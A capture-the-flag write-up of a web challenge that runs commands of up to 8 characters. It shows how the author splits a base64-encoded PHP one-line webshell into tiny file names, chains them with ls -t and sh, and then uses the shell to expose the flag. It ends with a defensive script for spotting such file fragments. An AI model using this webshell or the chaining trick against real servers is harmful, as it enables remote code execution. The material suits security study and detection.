CTF_Web: getshell with 8 controllable characters
2022-06-25 04:30:00 【AFCC_】
Challenge source
While practicing medium-difficulty CTF web challenges recently, I came across one where arbitrary commands can be executed as long as they fit within 8 characters, and the goal in the end is to getshell. I found that many predecessors have already written up this type of challenge, but you still need to practice it yourself. Visiting the challenge shows its source code, as shown in the figure:
Ideas: You can see that when the submitted parameter 1 contains a value of fewer than 8 characters, it is executed as a command. Running ?1=ls first shows that every file name is longer than 8 characters, so a command limited to 8 characters is clearly not enough to cat any file. Instead, file names have to be spliced together into code and executed to getshell.
Knowledge needed to solve the challenge
>a "On Linux this creates the file a directly, with no content"
ls -t "Lists the files in the directory in time order, most recently created first"
sh a "Executes the entire contents of file a as commands"
who\
am\
i "In a Linux command, a line ending in \ is continued on the next line, so these three lines run as whoami"
for example 
In this challenge the goal is to write a one-line webshell (a "one-sentence Trojan") to a file and then visit that file to getshell. The commands used here to create it are:
echo <?php echo shell_exec($_GET[1]); >1.php "Plain form, for ease of viewing"
echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWzFdKTs=|base64 -d>1.php "Uses base64 so that $ and other special characters do not cause the input to fail"
Enter this command in reverse order, one fragment at a time, then use ls -t>0 to write the fragments out in forward order and execute the result, which generates the one-line webshell. Note that all special characters must be escaped with \.
>hp
>1.p\\
>d\>\\
>\ -\\
>64\ \\
>base\\
>\=\|\\
>dKTs\\
>UWzF\\
>fR0V\\
>jKCR\\
>leGV\\
>sbF9\\
>zaGV\\
>obyB\\
>gZWN\\
>waHA\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
Use cat a to view the content written by ls -t.
Use ls to check whether sh a ran successfully and generated 1.php.
Then connect and use mv flag.php flag.txt to change the flag into txt format.
Finally, visit flag.txt to obtain the flag.
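From the defender's side, the trace this technique leaves in the working directory is a set of empty files with short names that end in \ or contain shell syntax. The triage script below is an added example, not part of the original write-up; the function names, the 8-character name limit and the metacharacter set are assumptions, and the sample files are constructed from the harmless whoami illustration.

```python
import os
import tempfile

# Assumption: characters that carry shell syntax and are unexpected in the
# names of files served from a web directory.
SHELL_META = set("\\|<>;&$` ")

def scan(directory, max_len=8):
    """Return (candidates, flagged) for one directory (POSIX file systems).

    candidates: (name, mtime_ns) of each empty regular file with a short name.
    flagged:    candidate names ending in a backslash or holding shell syntax.
    """
    candidates = []
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        st = entry.stat(follow_symlinks=False)
        if st.st_size == 0 and len(entry.name) <= max_len:
            candidates.append((entry.name, st.st_mtime_ns))
    flagged = [n for n, _ in candidates if n.endswith("\\") or SHELL_META & set(n)]
    return candidates, sorted(flagged)

def reconstruct(candidates):
    """Rebuild, for the incident record, the text sh would read from `ls -t`.

    Names go one per line, newest first; each backslash-newline pair is then
    dropped, which is how sh joins continued lines.
    """
    ordered = sorted(candidates, key=lambda c: c[1], reverse=True)
    return "\n".join(name for name, _ in ordered).replace("\\\n", "")

def make_sample(directory):
    """Constructed sample: the three fragments of the `whoami` illustration."""
    base = 1_700_000_000  # fixed timestamps keep the ordering deterministic
    for age, name in enumerate(["i", "am\\", "who\\"]):  # oldest first
        path = os.path.join(directory, name)
        open(path, "w").close()
        os.utime(path, (base + age, base + age))
    with open(os.path.join(directory, "index.php"), "w") as fh:
        fh.write("ordinary page")  # non-empty file with a long name, ignored

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_sample(tmp)
        found, suspicious = scan(tmp)
        print("flagged:", suspicious)
        print("reconstructed:", reconstruct(found))
```

The last fragment of a chain has a plain name, so it appears among the candidates but not among the flagged names; any flagged name in a directory is the signal to review all of its candidates together.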